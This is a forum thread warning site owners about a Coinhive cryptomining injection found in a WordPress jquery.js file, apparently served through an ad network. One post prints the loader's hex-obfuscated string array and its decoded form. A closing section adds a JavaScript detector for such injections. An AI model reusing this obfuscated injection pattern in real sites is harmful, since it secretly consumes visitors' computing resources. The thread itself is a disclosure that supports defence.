Title: Warning: potential malicious code originating from advertising network
Post by: n3wspartan on January 18, 2018, 10:01:53 PM

I'd encourage anybody who's using crypto ad networks to check your websites for potential malicious code.
Install an extension such as Minerblock and load your website. I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'. Please report your findings here. I won't disclose the network until we have more evidence.

Title: Re: Warning: potential malicious code originating from advertising network
Post by: n3wspartan on January 18, 2018, 10:12:20 PM

Here's the relevant code if anyone is interested:
Code:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];

If you decode var _0x7a2c using a service like http://ddecode.com/hexdecoder/, you'll get this:

Code:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];

Title: Re: Warning: potential malicious code originating from advertising network
Post by: Anti-Cen on January 18, 2018, 11:24:42 PM

Thanks for the warning
When it's not Microsoft leaving back doors open it's Google, and they both share the same paymasters whose name we dare not mention

Title: Re: Warning: potential malicious code originating from advertising network
Post by: diwataluna on January 19, 2018, 08:59:32 AM

I hope more evidence will be posted so more people will be aware, especially as we visit sites daily related to crypto. I have Adblock on my browser but even then have not been aware of surreptitious coinhive injections in sites I visit. Thanks for the heads-up.

Title: Re: Warning: potential malicious code originating from advertising network
Post by: CryptoWave on January 19, 2018, 09:26:23 AM

Quote:
Thanks for the warning
When it's not Microsoft leaving back doors open it's Google, and they both share the same paymasters whose name we dare not mention

This is likely not Google, probably smaller crypto-based networks (Coinzilla, a-ads, etc.). Would be great if OP could clarify which network the ad was being served from so people can blacklist them.

Title: Re: Warning: potential malicious code originating from advertising network
Post by: Lucius on January 19, 2018, 10:23:30 AM

Quote:
I'd encourage anybody who's using crypto ad networks to check your websites for potential malicious code.
Install an extension such as Minerblock and load your website. I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'. Please report your findings here. I won't disclose the network until we have more evidence.

There are a lot of mining scripts hidden in ads; I notice that because my antivirus/firewall blocks all of them and gives me a notice every time. I also asked some faucet owners about mining on their sites, but some of them say they never enabled such things, so it is obvious that it is hidden in ads. I do not know if it is possible to remove that code without removing the ads, but it is not nice to use someone's CPU in this way. It seems that the earnings from crypto-related ad networks are going down and they are looking for a way to get some extra profit.

Title: Re: Warning: potential malicious code originating from advertising network
Post by: diwataluna on January 30, 2018, 06:39:31 AM

By any chance, were you referring to what is reported here: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/
I was not able to compare the scripts used yet.

Title: Re: Warning: potential malicious code originating from advertising network
Post by: bitcoinstud on January 30, 2018, 10:18:08 AM

NoScript is quite good for protecting your browser, I run it alongside Adblock Plus... this is true though, I've seen ad content which will download and execute trojans also.
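
The manual decoding step in n3wspartan's second post can be scripted so that site files such as jquery.js are checked without pasting them into an online decoder. This is an added example, not code from the thread; the function names, the host allowlist and the constructed sample (with the placeholder host miner.invalid) are assumptions made for illustration.

```javascript
// Decode "\xNN" escape text into the characters it represents.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) =>
    String.fromCharCode(parseInt(h, 16)));
}

// Collect string literals made up entirely of \xNN escapes, decoded.
function extractHiddenStrings(source) {
  const literal = /(["'])((?:\\x[0-9a-fA-F]{2})+)\1/g;
  const out = [];
  for (const m of source.matchAll(literal)) out.push(decodeHexEscapes(m[2]));
  return out;
}

// Flag a file when its hidden strings contain both a URL on a host the site
// does not expect and the names needed to inject a <script> element.
function auditScript(source, allowedHosts) {
  const hidden = extractHiddenStrings(source);
  const unknownHosts = [];
  for (const s of hidden) {
    if (!/^https?:\/\//i.test(s)) continue;
    let host;
    try { host = new URL(s).hostname; } catch { continue; }
    if (!allowedHosts.includes(host) && !unknownHosts.includes(host)) {
      unknownHosts.push(host);
    }
  }
  const injectsScript = ["script", "createElement", "appendChild"]
    .every((k) => hidden.includes(k));
  return { hidden, unknownHosts, injectsScript,
           suspicious: unknownHosts.length > 0 && injectsScript };
}

// Constructed sample: an ordinary library line followed by an appended
// loader array whose strings are hex-escaped (placeholder host, not real).
const toHex = (s) => [...s].map((c) =>
  "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const SAMPLE = 'var lib = {name: "plain"};\n' +
  "var _0xabc = [" + ["script", "createElement", "src", "appendChild", "head",
    "https://miner.invalid/lib/m.min.js"]
    .map((s) => '"' + toHex(s) + '"').join(", ") + "];";

const report = auditScript(SAMPLE, ["ajax.googleapis.com"]);
console.log(report.suspicious, report.unknownHosts, report.hidden);
```

Run against a copy of each served .js file, with the allowlist set to the hosts the site actually loads scripts from; a hit is a prompt to diff the file against a known-good copy.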